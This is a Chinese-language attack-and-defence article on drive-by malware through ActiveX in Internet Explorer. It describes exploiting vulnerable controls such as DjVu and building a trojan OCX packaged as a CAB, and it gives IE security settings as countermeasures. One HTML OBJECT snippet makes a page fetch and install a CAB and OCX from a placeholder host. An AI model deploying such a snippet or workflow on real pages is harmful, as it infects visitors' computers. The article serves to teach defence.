ActiveX掛馬利用ActiveX是流氓軟體“行兇”的主要技術手段之一,流氓軟體大多都已經作古了,可ActiveX並沒有被推出人們的視野,網頁掛馬看上了它,於是ActiveX掛馬流行起來,成為了重要的幾種掛馬方式之一。
北岸團隊
ActiveX是微軟開發的。微軟的程式設計師似乎總是喜歡把世界想像的太過於善良,沒有人會用ActiveX作惡一樣。當年惡意軟體流行的時期,一家名為“XX寶貝視頻聊天室”的網站就曾利用色誘的方式,誘惑用戶主動安裝網站的ActiveX視頻聊天控制項。
該ActiveX控制項不僅會主動跟蹤用戶網路信息,還帶有彈出廣告、下載用戶Word文檔等流氓行為。當利用ActiveX作惡的流氓軟體越來越多後,微軟在IE7中就忍痛添加了關於ActiveX認證的措施。如今所有的ActiveX在IE7中都會被先禁止,而不在像當初一樣主動彈出安裝視窗。
小百科:ActiveX是Microsoft對於一系列策略性面向對象程式技術和工具的稱呼,ActiveX控制項在使用時需要安裝。
流行原因
在流氓軟體野蠻生長的那幾年,流氓軟體也如同各路山賊土匪一樣,往往會因為爭奪用戶電腦中的重要位置而產生火拚,於是許多如今被黑客或者病毒開發者用來製造病毒的技術被套用在了這些流氓軟體身上。後來病毒也開始向流氓軟體取經,許多流氓軟體開創的一些技術也被病毒拿來開始使用,ActiveX掛馬應該是病毒從流氓軟體身上學習的最徹底的技術。
小百科:許多瀏覽器在支持ActiveX方面並不如IE來的積極,雖然Firefox、網景等瀏覽器都在不同程度上支持ActiveX,但是ActiveX出現問題最多的仍然是IE瀏覽器。
ActiveX會被掛馬者利用,其實主要問題在於它的認證機制。早期,如果一個網站上有需要安裝ActiveX才能夠看到的東西,那么在訪問該網站的時候,相關的ActiveX會反覆的彈跳出來提示你是否安裝它,在許多用戶沒有明白情況和細節的時候,往往會因為各種原因點擊確定,允許ActiveX空間安裝。
這就如同走在馬路上,有一群人說自己原意跟你交朋友,這些人在面前一一經過,可以選擇點頭同意或者搖頭否定,凡是點頭同意的人都可以成為朋友,可以自由進出。恐怖的是,有些人在成為朋友之後,才發現他是個小偷或者無賴流氓。
目前利用ActiveX掛馬主要有兩種形勢,一種是利用正常程式的ActiveX漏洞進行溢出掛馬,另外一種則是直接編寫惡意的ActiveX木馬程式,將惡意的木馬程式偽裝成看似有某項功能的ActiveX控制項,欺騙用戶安裝。接下來的案例中將會為大家演示黑客如何利用ActiveX掛馬。
攻防實錄
方法1:通過漏洞掛馬
ActiveX掛馬攻:黑客在利用ActiveX進行網頁掛馬的時候,最常見到的就是利用那些帶有漏洞的ActiveX進行掛馬,通過用戶系統內已有的ActiveX控制項的觸發,讓木馬在不知不覺中植入用戶的電腦。
其中利用軟體ActiveX漏洞發動攻擊的著名例子有Flash和RealPlayer的ActiveX漏洞掛馬程式,這軟體的ActiveX漏洞都曾經造成了極大的危害,特別是RealPlayer至今仍然有黑客再使用這款軟體的ActiveX漏洞掛馬。
以前一段時間流行的DjVu ActiveX控制項漏洞為例,首先我們將惡意代碼輸入到寫字板中,然後另外儲存為任意的HTML檔案,然後利用IFRAME的代碼將聲稱的HTML檔案嵌入到正常的網頁中,此時輸入網址打開含有DjVu ActiveX控制項漏洞的網頁,我們本機的計算器程式就會被觸發開啟。而黑客通常不會這么善良,他們會將Shellcode代碼修改成下載指定惡意程式的代碼,然後讓用戶在打開相關網站後中招(圖1)。
小百科:DjVu ActiveX控制項是用於壓縮圖形檔案的工具,它在處理超長的ImageURL屬性參數時會出現溢出。如果用戶受騙訪問了惡意網頁並向該屬性傳送了超長參數的話,就可以觸發溢出,導致執行任意指令。
ActiveX掛馬防:對於利用ActiveX漏洞來進行掛馬的行為,最好的方法是建議用戶使用IE之外的瀏覽器,例如Firefox、Maxthon或360安全瀏覽器。此外作為補充,最好能夠安裝防掛馬軟體,值得注意的是,如果你要使用第三方瀏覽器,則需要設定防護軟體進行支持。
方法2:編寫惡意ActiveX木馬程式
攻:ActiveX木馬程式是利用許多用戶會盲從的點擊在網頁上彈出的ActiveX詢問安裝按鈕的弱點而進行傳播的。許多用戶往往並不能夠分辨出那些ActiveX是無害的,哪些是被偽裝成木馬病毒的。
ActiveX掛馬特別是這些本身就是木馬程式的ActiveX程式為自己裝扮上視頻聊天、美女圖庫等誘惑性的幌子之後,那些耐不住寂寞經不起誘惑的用戶就會衝動性的點擊安裝黑客設定在虛假網頁中的ActiveX木馬程式。
編寫自己的ActiveX木馬程式,仍然需要一定的編程基礎,另外整個過程相當複雜,由於版面的原因,我們這裡只向各位預備級安全工程師們簡單闡述一下黑客在編寫惡意ActiveX時的大致過程,如果有人對編寫細節感興趣,可以去查微軟MSDN中的詳細資訊。
先黑客會編寫一個具有Download或者其它惡意功能的OCX控制項,這是惡意ActiveX程式的核心和靈魂,然後黑客會在編寫一個Setup安全設定的INF檔案,並用CAB壓縮工具例如WinCAB將所需的兩個檔案壓縮打包成一個CAB檔案。最後黑客就可以將該為你見上傳到自己的網站中,並在網頁中寫入調用安裝ActiveX控制項的代碼即可開張,等待瀏覽該網頁並上鉤點擊確認安裝的受害者。
調用代碼如下:
<OBJECT classid=clsid:68ADAF59-76C1-4561-A45A-867F43545237
codeBase=http://192.168.1.1/web/setup.cab#version=1,0,0,0>
<PARAM NAME="Setup" VALUE="http:// 192.168.1.1/web/download.ocx">
</OBJECT>
當然,這樣的ActiveX代碼是沒有簽名驗證的,通常在IE的默認設定中不會被允許安裝,但是仍然方法可以突破這些安全限制。
防:一般ActiveX掛馬網頁都是因為加入了用編寫的惡意代碼才具有破壞力的,這些ActiveX惡意代碼就相當於一些小程式,只要打開該網頁就會被運行。所以要避免惡意ActiveX的攻擊只要禁止這些惡意代碼的運行就可以了。
防範此種方式掛馬的最好方法還是在客戶終端機上操作,在客戶終端機運行IE瀏覽器,點擊“工具→Internet選項→安全→自定義級別”,將安全級別定義為“高”,對“ActiveX控制項和外掛程式”中第2、3項設定為“禁用”,其它項設定為“提示”,之後點擊“確定”。這樣設定後,當你使用IE瀏覽網頁時,就能有效避免惡意網頁中惡意代碼的攻擊。
